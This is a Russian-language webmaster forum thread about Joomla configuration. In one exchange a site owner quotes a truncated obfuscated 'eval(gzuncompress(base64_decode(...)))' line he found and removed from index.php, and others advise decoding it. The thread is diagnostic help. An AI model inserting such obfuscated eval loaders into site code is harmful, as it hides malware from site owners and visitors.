- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
А в индексном файле темплейта что прописано, касаемо этих иконок, не помните))
У меня в индексном этот код
Внизу на сайте появились надписи:
Notice: Undefined index: link_act in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 58 Notice: Undefined variable: file in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112 Warning: file(): Filename cannot be empty in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112 Warning: mysql_fetch_array() expects parameter 1 to be resource, array given in /var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 115 Notice
Как это убрать? Когда ввел в гугле "/var/www/shkaf/data/www/okno23.in/vldisign/gate.php on line 112", заметил, что в выдаче есть достаточно много результатов... Что это может быть? Вначале я подумал, что это связано с sape, но затем понял, что нет (после удаления кода).
UPD. Проблему решил сам, удалив из кода это нечто:
"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU"
Что это было? В index.php почти в самом конце (после кода счетчиков). Это не вирус?
Есть сайт - категорий много.
Главная страница - тоже категория. Однако там материал обновляется очень редко. Возможно ли, чтобы на главной странице появились материалы из другой категории, но в то же время только свежие и только на первой странице, т.е. чтобы они не попадали в общий список?
Есть сайт - категорий много.
Главная страница - тоже категория. Однако там материал обновляется очень редко. Возможно ли, чтобы на главной странице появились материалы из другой категории, но в то же время только свежие и только на первой странице, т.е. чтобы они не попадали в общий список?
ставьте любой из модулей анонсов (например Mod News Pro GK4) только на главную и задавайте как хотите, вплоть до указания статей
"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU"
Что это было? В index.php почти в самом конце (после кода счетчиков). Это не вирус?
Смотрите тут http://base64.ru/
"eval(gzuncompress(base64_decode('eF5tjlELgjAUhf9KD8EUIsS1kYQP9mIMIzDSuQhxmxKiBoqU
Вместо eval впишите echo и увидите исходный код
ставьте любой из модулей анонсов (например Mod News Pro GK4) только на главную и задавайте как хотите, вплоть до указания статей
Спасибо! Поставил именно Mod News Pro GK4. Однако возможно ли сделать так, чтобы модуль отображался только на главной, но не отображался, когда открывается любой материал из данной категории? А то когда открываю материал из категории, то модуль, к сожалению, открывается тоже, что не очень удобно.
Спасибо! Поставил именно Mod News Pro GK4. Однако возможно ли сделать так, чтобы модуль отображался только на главной, но не отображался, когда открывается любой материал из данной категории? А то когда открываю материал из категории, то модуль, к сожалению, открывается тоже, что не очень удобно.
Привяжите его к пункту меню который у Вас выводит материалы на главной.
Привяжите его к пункту меню который у Вас выводит материалы на главной.
А как это сделать? Я открываю модуль, там внизу есть выбор. Указываю, что он должен быть отображен только на главной странице, а затем выбираю место расположения модуля... Но вот если я открываю любой материал на главной, то модуль открывается тоже (вместе со статьей).
Здравствуйте, подскажите как создать материал с адресом site.ru/kategoria/podkategoria/material
я создал категорию с алиасом kategoria. создал категорию с алиасом podkategoria в качестве родителя выбрал kategoria далее создал материал с алиасом material выбрав категорию podkategoria В итоге получил адрес site.ru/material Где я протормозил?